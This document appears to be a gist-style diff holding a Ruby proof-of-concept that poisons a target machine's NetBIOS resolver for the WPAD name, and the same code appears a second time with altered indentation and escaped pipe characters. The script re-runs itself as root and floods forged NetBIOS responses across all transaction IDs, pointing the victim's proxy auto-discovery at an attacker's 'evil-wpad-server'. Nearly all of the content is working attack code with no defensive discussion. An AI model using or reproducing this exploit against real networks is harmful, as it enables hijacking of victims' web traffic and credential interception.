izogain · June 23, 2016 16:15
diff --git a/netbios-brute-local.rb b/netbios-brute-local.rb
 #!/usr/bin/env ruby
 # -*- coding: binary -*-

 #
 # Poison a system's NetBIOS resolver for the WPAD name (not BadTunnel)
 #
 #      Usage: ruby netbios-brute-local.rb <evil-wpad-server> <target-ip> <target-port> <pps>
 #    Contact: x[at]hdm.io
 #    License: https://opensource.org/licenses/BSD-2-Clause
 #
 # In most cases, this PoC should be directed at port 137
 # For NAT exploitation, see https://gist.github.com/hdm/041641b6896779ebb77e04a578001c28
 #

 require 'socket'
 require 'ipaddr'

 def get_root
  if RUBY_PLATFORM.index("linux") && Process.euid != 0
    this_sudo = `which rvmsudo`.index("rvmsudo") ? "rvmsudo" : "sudo"
    this_ruby = File.readlink("/proc/self/exe")
    args = [this_sudo, this_ruby, __FILE__, *ARGV]
    exec(*args)
  end
 end

 def get_socket_address(target, port)
  udp = UDPSocket.new
  udp.setsockopt(Socket::SOL_SOCKET, Socket::SO_BROADCAST, true)
  udp.bind('0.0.0.0', 137)
  udp.connect(target, port)
  family, address = Socket.unpack_sockaddr_in(udp.getsockname)
  [udp, address]
 end


 def usage
  $stderr.puts "Usage: #{$0} [wpad-server-ip] [target-ip] [target-port] <pps-rate>"
  exit(1)
 end

 wpad_addr = IPAddr.new( ARGV[0] || usage() )
 targ_addr = IPAddr.new( ARGV[1] || usage() )
 targ_port = ( ARGV[2] || usage() ).to_i
 targ_rate = ( ARGV[3] || 30_000 ).to_i

 get_root

 sock,self_addr = get_socket_address(targ_addr.to_s, targ_port)

 payload = ["FFFF85000000000100000000204648464145424545434143414341434143414341434143414341434143414141000020000100FFFFFF000600000FFFFFFFF"].pack("H*")
 payload[58,4] = wpad_addr.hton

 stime = Time.now.to_f
 pcnt = 0
 pps  = 0

 $stdout.puts "[*] Spamming WPAD responses to #{targ_addr.to_s}:#{targ_port} at #{targ_rate}/pps..."
 loop do
  0.upto(65535) do |txid|
    begin
      payload[0,2] = [txid].pack("n")
      sock.write(payload)
      pcnt += 1

      pps = (pcnt / (Time.now.to_f - stime)).to_i
      if pps > targ_rate
        sleep(0.01)
      end
    end
  end
 end
	#!/usr/bin/env ruby
	# -- coding: binary --

	#
	# Poison a system's NetBIOS resolver for the WPAD name (not BadTunnel)
	#
	# Usage: ruby netbios-brute-local.rb <evil-wpad-server> <target-ip> <target-port> <pps>
	# Contact: x[at]hdm.io
	# License: https://opensource.org/licenses/BSD-2-Clause
	#
	# In most cases, this PoC should be directed at port 137
	# For NAT exploitation, see https://gist.github.com/hdm/041641b6896779ebb77e04a578001c28
	#

	require 'socket'
	require 'ipaddr'

	def get_root
	if RUBY_PLATFORM.index("linux") && Process.euid != 0
	this_sudo = `which rvmsudo`.index("rvmsudo") ? "rvmsudo" : "sudo"
	this_ruby = File.readlink("/proc/self/exe")
	args = [this_sudo, this_ruby, __FILE__, *ARGV]
	exec(*args)
	end
	end

	def get_socket_address(target, port)
	udp = UDPSocket.new
	udp.setsockopt(Socket::SOL_SOCKET, Socket::SO_BROADCAST, true)
	udp.bind('0.0.0.0', 137)
	udp.connect(target, port)
	family, address = Socket.unpack_sockaddr_in(udp.getsockname)
	[udp, address]
	end


	def usage
	$stderr.puts "Usage: #{$0} [wpad-server-ip] [target-ip] [target-port] <pps-rate>"
	exit(1)
	end

	wpad_addr = IPAddr.new( ARGV[0] \|\| usage() )
	targ_addr = IPAddr.new( ARGV[1] \|\| usage() )
	targ_port = ( ARGV[2] \|\| usage() ).to_i
	targ_rate = ( ARGV[3] \|\| 30_000 ).to_i

	get_root

	sock,self_addr = get_socket_address(targ_addr.to_s, targ_port)

	payload = ["FFFF85000000000100000000204648464145424545434143414341434143414341434143414341434143414141000020000100FFFFFF000600000FFFFFFFF"].pack("H*")
	payload[58,4] = wpad_addr.hton

	stime = Time.now.to_f
	pcnt = 0
	pps = 0

	$stdout.puts "[*] Spamming WPAD responses to #{targ_addr.to_s}:#{targ_port} at #{targ_rate}/pps..."
	loop do
	0.upto(65535) do \|txid\|
	begin
	payload[0,2] = [txid].pack("n")
	sock.write(payload)
	pcnt += 1

	pps = (pcnt / (Time.now.to_f - stime)).to_i
	if pps > targ_rate
	sleep(0.01)
	end
	end
	end
	end